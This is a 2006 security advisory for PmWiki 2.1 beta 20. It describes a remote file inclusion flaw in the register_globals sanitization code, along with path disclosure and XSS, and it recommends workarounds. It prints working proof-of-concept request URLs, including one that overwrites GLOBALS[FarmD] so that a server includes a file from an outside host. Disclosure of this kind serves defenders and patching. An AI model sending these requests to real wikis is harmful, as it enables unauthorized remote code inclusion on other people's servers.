PmWiki Multiple Vulnerabilities Name Multiple Vulnerabilities in PmWiki Systems Affected PmWiki (verified on 2.1 beta 20) Severity Medium Risk Vendor www.pmichaud.com/wiki/PmWiki/PmWiki Advisory http://www.ush.it/2005/11/28/pmwiki-multiple-vulnerabilities/ Advisory http://www.ush.it/team/ascii/hack-PmWiki/advisory.txt Author Francesco "aScii" Ongaro (ascii at katamail . com) Date 20060119 I. BACKGROUND PmWiki is a PHP wiki program, more information is available at the vendor site. II. DESCRIPTION PmWiki is vulnerable to remote arbitrary file inclusion due to the mechanism used to sanitize global vars. Incriminated code is if (ini_get('register_globals')) foreach($_REQUEST as $k=>$v) { unset(${$k}); } [..CUT..] SDV($FarmD,dirname(__FILE__)); [..CUT..] function SDV(&$v,$x) { if (!isset($v)) $v=$x; } As you can see instead disabling register_globals runtime the code try to unset all the _REQUEST keys. FarmD is the basepath for all includes and many datafiles. The function SDV overwrite the variable only if new. III. ANALYSIS This vulnerability exists only with register_globals on. If you cannot disable globals at last you should disable remote fopens. *** Path disclosure in index.php/pmwiki.php *** /pmwiki-2.1.beta20/pmwiki.php?GLOBALS&_SERVER&_REQUEST&_GET&_POST&_ENV The incriminated GLOBALS sanitization code will unset any variable for you. *** Arbitrary remote file inclusion in index.php/pmwiki.php *** /pmwiki-2.1.beta20/pmwiki.php?GLOBALS&GLOBALS[FarmD]=http://www.ush.it You will get: Warning: main(http://www.ush.it/scripts/stdconfig.php) [function.main]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in \pmwiki-2.1.beta20\pmwiki.php on line 276 Warning: main() [function.include]: Failed opening 'http://www.ush.it/ scripts/stdconfig.php' for inclusion in \pmwiki-2.1.beta20\pmwiki.php on line 276 While with FarmD it's possible to include remote files with WorkDir you can exploit PmWiki by directory traversal includes. *** Multiple XSS *** As done with GLOBALS[FarmD] it's possible to inject malicious JS and HTML code in some vars that will be lately echoed, thus a lot of vars has to be redefined to allow PmWiki work with no errors and display the XSS code. IV. DETECTION PmWiki 2.1 beta 20 is vulnerable. Older version not verified. V. WORKAROUND Register global off will fix. Also to minimize the impact of this vuln you can disable remote fopens turning this bug in an arbitrary directory traversal file include. For deeper fixage wait for an official patch. VI. VENDOR RESPONSE No vendor response at this time. VII. CVE INFORMATION No CVE at this time. VIII. DISCLOSURE TIMELINE 20060119 Bug discovered 20060119 Internal release IX. CREDIT Francesco "aScii" Ongaro is credited with the discovery of this vulnerability. X. LEGAL NOTICES Copyright (c) 2005 Francesco "aScii" Ongaro Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without mine express written consent. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email me for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.